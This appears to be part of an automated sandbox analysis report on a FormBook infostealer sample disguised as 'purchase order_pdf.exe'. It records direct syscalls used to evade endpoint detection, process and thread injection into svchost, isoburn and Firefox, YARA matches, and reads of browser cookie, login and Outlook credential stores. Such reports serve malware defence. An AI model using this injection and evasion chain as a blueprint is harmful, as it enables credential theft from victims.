Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03738AA0 mov eax, dword ptr fs:[00000030h]	1_2_03738AA0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03786AA4 mov eax, dword ptr fs:[00000030h]	1_2_03786AA4
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03768A90 mov edx, dword ptr fs:[00000030h]	1_2_03768A90
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0373EA80 mov eax, dword ptr fs:[00000030h]	1_2_0373EA80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0373EA80 mov eax, dword ptr fs:[00000030h]	1_2_0373EA80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0373EA80 mov eax, dword ptr fs:[00000030h]	1_2_0373EA80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0373EA80 mov eax, dword ptr fs:[00000030h]	1_2_0373EA80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0373EA80 mov eax, dword ptr fs:[00000030h]	1_2_0373EA80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0373EA80 mov eax, dword ptr fs:[00000030h]	1_2_0373EA80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0373EA80 mov eax, dword ptr fs:[00000030h]	1_2_0373EA80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0373EA80 mov eax, dword ptr fs:[00000030h]	1_2_0373EA80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0373EA80 mov eax, dword ptr fs:[00000030h]	1_2_0373EA80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_037D4978 mov eax, dword ptr fs:[00000030h]	1_2_037D4978
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_037D4978 mov eax, dword ptr fs:[00000030h]	1_2_037D4978
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_037BC97C mov eax, dword ptr fs:[00000030h]	1_2_037BC97C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03756962 mov eax, dword ptr fs:[00000030h]	1_2_03756962
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03756962 mov eax, dword ptr fs:[00000030h]	1_2_03756962
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03756962 mov eax, dword ptr fs:[00000030h]	1_2_03756962
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0377096E mov eax, dword ptr fs:[00000030h]	1_2_0377096E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0377096E mov edx, dword ptr fs:[00000030h]	1_2_0377096E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0377096E mov eax, dword ptr fs:[00000030h]	1_2_0377096E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_037B0946 mov eax, dword ptr fs:[00000030h]	1_2_037B0946
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_037B892A mov eax, dword ptr fs:[00000030h]	1_2_037B892A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_037C892B mov eax, dword ptr fs:[00000030h]	1_2_037C892B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_037BC912 mov eax, dword ptr fs:[00000030h]	1_2_037BC912
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03728918 mov eax, dword ptr fs:[00000030h]	1_2_03728918
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03728918 mov eax, dword ptr fs:[00000030h]	1_2_03728918
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_037AE908 mov eax, dword ptr fs:[00000030h]	1_2_037AE908
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_037AE908 mov eax, dword ptr fs:[00000030h]	1_2_037AE908
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_037629F9 mov eax, dword ptr fs:[00000030h]	1_2_037629F9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_037629F9 mov eax, dword ptr fs:[00000030h]	1_2_037629F9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_037BE9E0 mov eax, dword ptr fs:[00000030h]	1_2_037BE9E0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0373A9D0 mov eax, dword ptr fs:[00000030h]	1_2_0373A9D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0373A9D0 mov eax, dword ptr fs:[00000030h]	1_2_0373A9D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0373A9D0 mov eax, dword ptr fs:[00000030h]	1_2_0373A9D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0373A9D0 mov eax, dword ptr fs:[00000030h]	1_2_0373A9D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0373A9D0 mov eax, dword ptr fs:[00000030h]	1_2_0373A9D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0373A9D0 mov eax, dword ptr fs:[00000030h]	1_2_0373A9D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_037649D0 mov eax, dword ptr fs:[00000030h]	1_2_037649D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_037FA9D3 mov eax, dword ptr fs:[00000030h]	1_2_037FA9D3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_037C69C0 mov eax, dword ptr fs:[00000030h]	1_2_037C69C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03804940 mov eax, dword ptr fs:[00000030h]	1_2_03804940
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_037B89B3 mov esi, dword ptr fs:[00000030h]	1_2_037B89B3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_037B89B3 mov eax, dword ptr fs:[00000030h]	1_2_037B89B3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_037B89B3 mov eax, dword ptr fs:[00000030h]	1_2_037B89B3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_037429A0 mov eax, dword ptr fs:[00000030h]	1_2_037429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_037429A0 mov eax, dword ptr fs:[00000030h]	1_2_037429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_037429A0 mov eax, dword ptr fs:[00000030h]	1_2_037429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_037429A0 mov eax, dword ptr fs:[00000030h]	1_2_037429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_037429A0 mov eax, dword ptr fs:[00000030h]	1_2_037429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_037429A0 mov eax, dword ptr fs:[00000030h]	1_2_037429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_037429A0 mov eax, dword ptr fs:[00000030h]	1_2_037429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_037429A0 mov eax, dword ptr fs:[00000030h]	1_2_037429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_037429A0 mov eax, dword ptr fs:[00000030h]	1_2_037429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_037429A0 mov eax, dword ptr fs:[00000030h]	1_2_037429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_037429A0 mov eax, dword ptr fs:[00000030h]	1_2_037429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_037429A0 mov eax, dword ptr fs:[00000030h]	1_2_037429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_037429A0 mov eax, dword ptr fs:[00000030h]	1_2_037429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_037309AD mov eax, dword ptr fs:[00000030h]	1_2_037309AD
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_037309AD mov eax, dword ptr fs:[00000030h]	1_2_037309AD
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_037BE872 mov eax, dword ptr fs:[00000030h]	1_2_037BE872
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_037BE872 mov eax, dword ptr fs:[00000030h]	1_2_037BE872
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_037C6870 mov eax, dword ptr fs:[00000030h]	1_2_037C6870
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_037C6870 mov eax, dword ptr fs:[00000030h]	1_2_037C6870
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03760854 mov eax, dword ptr fs:[00000030h]	1_2_03760854
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03734859 mov eax, dword ptr fs:[00000030h]	1_2_03734859
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03734859 mov eax, dword ptr fs:[00000030h]	1_2_03734859
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03742840 mov ecx, dword ptr fs:[00000030h]	1_2_03742840
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03752835 mov eax, dword ptr fs:[00000030h]	1_2_03752835
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03752835 mov eax, dword ptr fs:[00000030h]	1_2_03752835
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03752835 mov eax, dword ptr fs:[00000030h]	1_2_03752835
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03752835 mov ecx, dword ptr fs:[00000030h]	1_2_03752835
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03752835 mov eax, dword ptr fs:[00000030h]	1_2_03752835

Source: C:\Users\user\Desktop\purchase order_pdf.exe

Code function: 0_2_008C81F7 GetSecurityDescriptorDacl,_memset,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,

0_2_008C81F7

Source: C:\Users\user\Desktop\purchase order_pdf.exe	Code function: 0_2_0089A395 SetUnhandledExceptionFilter,UnhandledExceptionFilter,		0_2_0089A395
Source: C:\Users\user\Desktop\purchase order_pdf.exe	Code function: 0_2_0089A364 SetUnhandledExceptionFilter,		0_2_0089A364

HIPS / PFW / Operating System Protection Evasion

Found direct / indirect Syscall (likely to bypass EDR)

Source: C:\Program Files (x86)\tVlZmxSoVuuTzQSYOHWiqGdCFqCdblJSzaTwsRvHLUpGXFPotQhcHZvmHLkRIfNX\PIrlNRZFMoz.exe	NtWriteVirtualMemory: Direct from: 0x76F0490C	Jump to behavior
Source: C:\Program Files (x86)\tVlZmxSoVuuTzQSYOHWiqGdCFqCdblJSzaTwsRvHLUpGXFPotQhcHZvmHLkRIfNX\PIrlNRZFMoz.exe	NtAllocateVirtualMemory: Direct from: 0x76F03C9C	Jump to behavior
Source: C:\Program Files (x86)\tVlZmxSoVuuTzQSYOHWiqGdCFqCdblJSzaTwsRvHLUpGXFPotQhcHZvmHLkRIfNX\PIrlNRZFMoz.exe	NtClose: Direct from: 0x76F02B6C
Source: C:\Program Files (x86)\tVlZmxSoVuuTzQSYOHWiqGdCFqCdblJSzaTwsRvHLUpGXFPotQhcHZvmHLkRIfNX\PIrlNRZFMoz.exe	NtReadVirtualMemory: Direct from: 0x76F02E8C	Jump to behavior
Source: C:\Program Files (x86)\tVlZmxSoVuuTzQSYOHWiqGdCFqCdblJSzaTwsRvHLUpGXFPotQhcHZvmHLkRIfNX\PIrlNRZFMoz.exe	NtCreateKey: Direct from: 0x76F02C6C	Jump to behavior
Source: C:\Program Files (x86)\tVlZmxSoVuuTzQSYOHWiqGdCFqCdblJSzaTwsRvHLUpGXFPotQhcHZvmHLkRIfNX\PIrlNRZFMoz.exe	NtSetInformationThread: Direct from: 0x76F02B4C	Jump to behavior
Source: C:\Program Files (x86)\tVlZmxSoVuuTzQSYOHWiqGdCFqCdblJSzaTwsRvHLUpGXFPotQhcHZvmHLkRIfNX\PIrlNRZFMoz.exe	NtQueryAttributesFile: Direct from: 0x76F02E6C	Jump to behavior
Source: C:\Program Files (x86)\tVlZmxSoVuuTzQSYOHWiqGdCFqCdblJSzaTwsRvHLUpGXFPotQhcHZvmHLkRIfNX\PIrlNRZFMoz.exe	NtAllocateVirtualMemory: Direct from: 0x76F048EC	Jump to behavior
Source: C:\Program Files (x86)\tVlZmxSoVuuTzQSYOHWiqGdCFqCdblJSzaTwsRvHLUpGXFPotQhcHZvmHLkRIfNX\PIrlNRZFMoz.exe	NtQuerySystemInformation: Direct from: 0x76F048CC	Jump to behavior
Source: C:\Program Files (x86)\tVlZmxSoVuuTzQSYOHWiqGdCFqCdblJSzaTwsRvHLUpGXFPotQhcHZvmHLkRIfNX\PIrlNRZFMoz.exe	NtQueryVolumeInformationFile: Direct from: 0x76F02F2C	Jump to behavior
Source: C:\Program Files (x86)\tVlZmxSoVuuTzQSYOHWiqGdCFqCdblJSzaTwsRvHLUpGXFPotQhcHZvmHLkRIfNX\PIrlNRZFMoz.exe	NtOpenSection: Direct from: 0x76F02E0C	Jump to behavior
Source: C:\Program Files (x86)\tVlZmxSoVuuTzQSYOHWiqGdCFqCdblJSzaTwsRvHLUpGXFPotQhcHZvmHLkRIfNX\PIrlNRZFMoz.exe	NtSetInformationThread: Direct from: 0x76EF63F9	Jump to behavior
Source: C:\Program Files (x86)\tVlZmxSoVuuTzQSYOHWiqGdCFqCdblJSzaTwsRvHLUpGXFPotQhcHZvmHLkRIfNX\PIrlNRZFMoz.exe	NtDeviceIoControlFile: Direct from: 0x76F02AEC	Jump to behavior
Source: C:\Program Files (x86)\tVlZmxSoVuuTzQSYOHWiqGdCFqCdblJSzaTwsRvHLUpGXFPotQhcHZvmHLkRIfNX\PIrlNRZFMoz.exe	NtAllocateVirtualMemory: Direct from: 0x76F02BEC	Jump to behavior
Source: C:\Program Files (x86)\tVlZmxSoVuuTzQSYOHWiqGdCFqCdblJSzaTwsRvHLUpGXFPotQhcHZvmHLkRIfNX\PIrlNRZFMoz.exe	NtCreateFile: Direct from: 0x76F02FEC	Jump to behavior
Source: C:\Program Files (x86)\tVlZmxSoVuuTzQSYOHWiqGdCFqCdblJSzaTwsRvHLUpGXFPotQhcHZvmHLkRIfNX\PIrlNRZFMoz.exe	NtOpenFile: Direct from: 0x76F02DCC	Jump to behavior
Source: C:\Program Files (x86)\tVlZmxSoVuuTzQSYOHWiqGdCFqCdblJSzaTwsRvHLUpGXFPotQhcHZvmHLkRIfNX\PIrlNRZFMoz.exe	NtQueryInformationToken: Direct from: 0x76F02CAC	Jump to behavior
Source: C:\Program Files (x86)\tVlZmxSoVuuTzQSYOHWiqGdCFqCdblJSzaTwsRvHLUpGXFPotQhcHZvmHLkRIfNX\PIrlNRZFMoz.exe	NtTerminateThread: Direct from: 0x76F02FCC	Jump to behavior
Source: C:\Program Files (x86)\tVlZmxSoVuuTzQSYOHWiqGdCFqCdblJSzaTwsRvHLUpGXFPotQhcHZvmHLkRIfNX\PIrlNRZFMoz.exe	NtProtectVirtualMemory: Direct from: 0x76EF7B2E	Jump to behavior
Source: C:\Program Files (x86)\tVlZmxSoVuuTzQSYOHWiqGdCFqCdblJSzaTwsRvHLUpGXFPotQhcHZvmHLkRIfNX\PIrlNRZFMoz.exe	NtOpenKeyEx: Direct from: 0x76F02B9C	Jump to behavior
Source: C:\Program Files (x86)\tVlZmxSoVuuTzQSYOHWiqGdCFqCdblJSzaTwsRvHLUpGXFPotQhcHZvmHLkRIfNX\PIrlNRZFMoz.exe	NtProtectVirtualMemory: Direct from: 0x76F02F9C	Jump to behavior
Source: C:\Program Files (x86)\tVlZmxSoVuuTzQSYOHWiqGdCFqCdblJSzaTwsRvHLUpGXFPotQhcHZvmHLkRIfNX\PIrlNRZFMoz.exe	NtSetInformationProcess: Direct from: 0x76F02C5C	Jump to behavior
Source: C:\Program Files (x86)\tVlZmxSoVuuTzQSYOHWiqGdCFqCdblJSzaTwsRvHLUpGXFPotQhcHZvmHLkRIfNX\PIrlNRZFMoz.exe	NtNotifyChangeKey: Direct from: 0x76F03C2C	Jump to behavior
Source: C:\Program Files (x86)\tVlZmxSoVuuTzQSYOHWiqGdCFqCdblJSzaTwsRvHLUpGXFPotQhcHZvmHLkRIfNX\PIrlNRZFMoz.exe	NtCreateMutant: Direct from: 0x76F035CC	Jump to behavior
Source: C:\Program Files (x86)\tVlZmxSoVuuTzQSYOHWiqGdCFqCdblJSzaTwsRvHLUpGXFPotQhcHZvmHLkRIfNX\PIrlNRZFMoz.exe	NtWriteVirtualMemory: Direct from: 0x76F02E3C	Jump to behavior
Source: C:\Program Files (x86)\tVlZmxSoVuuTzQSYOHWiqGdCFqCdblJSzaTwsRvHLUpGXFPotQhcHZvmHLkRIfNX\PIrlNRZFMoz.exe	NtMapViewOfSection: Direct from: 0x76F02D1C	Jump to behavior
Source: C:\Program Files (x86)\tVlZmxSoVuuTzQSYOHWiqGdCFqCdblJSzaTwsRvHLUpGXFPotQhcHZvmHLkRIfNX\PIrlNRZFMoz.exe	NtResumeThread: Direct from: 0x76F036AC	Jump to behavior
Source: C:\Program Files (x86)\tVlZmxSoVuuTzQSYOHWiqGdCFqCdblJSzaTwsRvHLUpGXFPotQhcHZvmHLkRIfNX\PIrlNRZFMoz.exe	NtAllocateVirtualMemory: Direct from: 0x76F02BFC	Jump to behavior
Source: C:\Program Files (x86)\tVlZmxSoVuuTzQSYOHWiqGdCFqCdblJSzaTwsRvHLUpGXFPotQhcHZvmHLkRIfNX\PIrlNRZFMoz.exe	NtReadFile: Direct from: 0x76F02ADC	Jump to behavior
Source: C:\Program Files (x86)\tVlZmxSoVuuTzQSYOHWiqGdCFqCdblJSzaTwsRvHLUpGXFPotQhcHZvmHLkRIfNX\PIrlNRZFMoz.exe	NtQuerySystemInformation: Direct from: 0x76F02DFC	Jump to behavior
Source: C:\Program Files (x86)\tVlZmxSoVuuTzQSYOHWiqGdCFqCdblJSzaTwsRvHLUpGXFPotQhcHZvmHLkRIfNX\PIrlNRZFMoz.exe	NtDelayExecution: Direct from: 0x76F02DDC	Jump to behavior
Source: C:\Program Files (x86)\tVlZmxSoVuuTzQSYOHWiqGdCFqCdblJSzaTwsRvHLUpGXFPotQhcHZvmHLkRIfNX\PIrlNRZFMoz.exe	NtQueryInformationProcess: Direct from: 0x76F02C26	Jump to behavior
Source: C:\Program Files (x86)\tVlZmxSoVuuTzQSYOHWiqGdCFqCdblJSzaTwsRvHLUpGXFPotQhcHZvmHLkRIfNX\PIrlNRZFMoz.exe	NtResumeThread: Direct from: 0x76F02FBC	Jump to behavior
Source: C:\Program Files (x86)\tVlZmxSoVuuTzQSYOHWiqGdCFqCdblJSzaTwsRvHLUpGXFPotQhcHZvmHLkRIfNX\PIrlNRZFMoz.exe	NtCreateUserProcess: Direct from: 0x76F0371C	Jump to behavior

Maps a DLL or memory area into another process

Source: C:\Users\user\Desktop\purchase order_pdf.exe	Section loaded: NULL target: C:\Windows\SysWOW64\svchost.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: NULL target: C:\Program Files (x86)\tVlZmxSoVuuTzQSYOHWiqGdCFqCdblJSzaTwsRvHLUpGXFPotQhcHZvmHLkRIfNX\PIrlNRZFMoz.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: NULL target: C:\Windows\SysWOW64\isoburn.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\isoburn.exe	Section loaded: NULL target: C:\Program Files (x86)\tVlZmxSoVuuTzQSYOHWiqGdCFqCdblJSzaTwsRvHLUpGXFPotQhcHZvmHLkRIfNX\PIrlNRZFMoz.exe protection: read write	Jump to behavior
Source: C:\Windows\SysWOW64\isoburn.exe	Section loaded: NULL target: C:\Program Files (x86)\tVlZmxSoVuuTzQSYOHWiqGdCFqCdblJSzaTwsRvHLUpGXFPotQhcHZvmHLkRIfNX\PIrlNRZFMoz.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\isoburn.exe	Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read write	Jump to behavior
Source: C:\Windows\SysWOW64\isoburn.exe	Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and write	Jump to behavior

Modifies the context of a thread in another process (thread injection)

Source: C:\Windows\SysWOW64\isoburn.exe

Thread register set: target process: 7924

Jump to behavior

Queues an APC in another process (thread injection)

Source: C:\Windows\SysWOW64\isoburn.exe

Thread APC queued: target process: C:\Program Files (x86)\tVlZmxSoVuuTzQSYOHWiqGdCFqCdblJSzaTwsRvHLUpGXFPotQhcHZvmHLkRIfNX\PIrlNRZFMoz.exe

Jump to behavior

Writes to foreign memory regions

Source: C:\Users\user\Desktop\purchase order_pdf.exe

Memory written: C:\Windows\SysWOW64\svchost.exe base: 2D20008

Jump to behavior

Source: C:\Users\user\Desktop\purchase order_pdf.exe

Code function: 0_2_008C8C93 LogonUserW,

0_2_008C8C93

Source: C:\Users\user\Desktop\purchase order_pdf.exe

Code function: 0_2_00873B4C GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,

0_2_00873B4C

Source: C:\Users\user\Desktop\purchase order_pdf.exe

Code function: 0_2_00874A35 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,

0_2_00874A35

Source: C:\Users\user\Desktop\purchase order_pdf.exe

Code function: 0_2_008D4EC9 mouse_event,

0_2_008D4EC9

Source: C:\Users\user\Desktop\purchase order_pdf.exe	Process created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\purchase order_pdf.exe"	Jump to behavior
Source: C:\Program Files (x86)\tVlZmxSoVuuTzQSYOHWiqGdCFqCdblJSzaTwsRvHLUpGXFPotQhcHZvmHLkRIfNX\PIrlNRZFMoz.exe	Process created: C:\Windows\SysWOW64\isoburn.exe "C:\Windows\SysWOW64\isoburn.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\isoburn.exe	Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"	Jump to behavior

Source: C:\Users\user\Desktop\purchase order_pdf.exe

0_2_008C81F7

Source: C:\Users\user\Desktop\purchase order_pdf.exe

Code function: 0_2_008D4C03 AllocateAndInitializeSid,CheckTokenMembership,FreeSid,

0_2_008D4C03

Source: purchase order_pdf.exe	Binary or memory string: Run Script:AutoIt script files (.au3, .a3x).au3;.a3xAll files (.).au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
Source: purchase order_pdf.exe, PIrlNRZFMoz.exe, 00000005.00000000.1988128039.0000000000EF0000.00000002.00000001.00040000.00000000.sdmp, PIrlNRZFMoz.exe, 00000005.00000002.4111805282.0000000000EF0000.00000002.00000001.00040000.00000000.sdmp, PIrlNRZFMoz.exe, 00000008.00000002.4112102128.00000000019B0000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Shell_TrayWnd
Source: PIrlNRZFMoz.exe, 00000005.00000000.1988128039.0000000000EF0000.00000002.00000001.00040000.00000000.sdmp, PIrlNRZFMoz.exe, 00000005.00000002.4111805282.0000000000EF0000.00000002.00000001.00040000.00000000.sdmp, PIrlNRZFMoz.exe, 00000008.00000002.4112102128.00000000019B0000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Progman
Source: PIrlNRZFMoz.exe, 00000005.00000000.1988128039.0000000000EF0000.00000002.00000001.00040000.00000000.sdmp, PIrlNRZFMoz.exe, 00000005.00000002.4111805282.0000000000EF0000.00000002.00000001.00040000.00000000.sdmp, PIrlNRZFMoz.exe, 00000008.00000002.4112102128.00000000019B0000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Progmanlock
Source: PIrlNRZFMoz.exe, 00000005.00000000.1988128039.0000000000EF0000.00000002.00000001.00040000.00000000.sdmp, PIrlNRZFMoz.exe, 00000005.00000002.4111805282.0000000000EF0000.00000002.00000001.00040000.00000000.sdmp, PIrlNRZFMoz.exe, 00000008.00000002.4112102128.00000000019B0000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: }Program Manager

Source: C:\Users\user\Desktop\purchase order_pdf.exe

Code function: 0_2_0089886B cpuid

0_2_0089886B

Source: C:\Users\user\Desktop\purchase order_pdf.exe

Code function: 0_2_008A50D7 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,

0_2_008A50D7

Source: C:\Users\user\Desktop\purchase order_pdf.exe

Code function: 0_2_008B2230 GetUserNameW,

0_2_008B2230

Source: C:\Users\user\Desktop\purchase order_pdf.exe

Code function: 0_2_008A418A __lock,____lc_codepage_func,__getenv_helper_nolock,_free,_strlen,__malloc_crt,_strlen,__invoke_watson,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,

0_2_008A418A

Source: C:\Users\user\Desktop\purchase order_pdf.exe

Code function: 0_2_00874AFE GetVersionExW,GetCurrentProcess,IsWow64Process,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,

0_2_00874AFE

Stealing of Sensitive Information

Yara detected FormBook

Source: Yara match	File source: 1.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000001.00000002.2065361338.0000000003590000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.4110965953.0000000002D40000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.4111287403.0000000003210000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.4114217360.0000000005850000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.4112163408.0000000002620000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.2065096349.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.4112133751.0000000004B20000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.2065764194.0000000003E00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Windows\SysWOW64\isoburn.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies	Jump to behavior
Source: C:\Windows\SysWOW64\isoburn.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Windows\SysWOW64\isoburn.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Windows\SysWOW64\isoburn.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\Windows\SysWOW64\isoburn.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data	Jump to behavior
Source: C:\Windows\SysWOW64\isoburn.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local State	Jump to behavior
Source: C:\Windows\SysWOW64\isoburn.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local State	Jump to behavior
Source: C:\Windows\SysWOW64\isoburn.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data	Jump to behavior

Tries to steal Mail credentials (via file / registry access)

Source: C:\Windows\SysWOW64\isoburn.exe

Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\

Jump to behavior

Source: purchase order_pdf.exe	Binary or memory string: WIN_81
Source: purchase order_pdf.exe	Binary or memory string: WIN_XP
Source: purchase order_pdf.exe	Binary or memory string: WIN_XPe
Source: purchase order_pdf.exe	Binary or memory string: WIN_VISTA
Source: purchase order_pdf.exe	Binary or memory string: WIN_7
Source: purchase order_pdf.exe	Binary or memory string: WIN_8
Source: purchase order_pdf.exe	Binary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_10WIN_2016WIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\Appearance3, 3, 14, 5USERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubyte

Remote Access Functionality

Yara detected FormBook

Source: Yara match	File source: 1.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
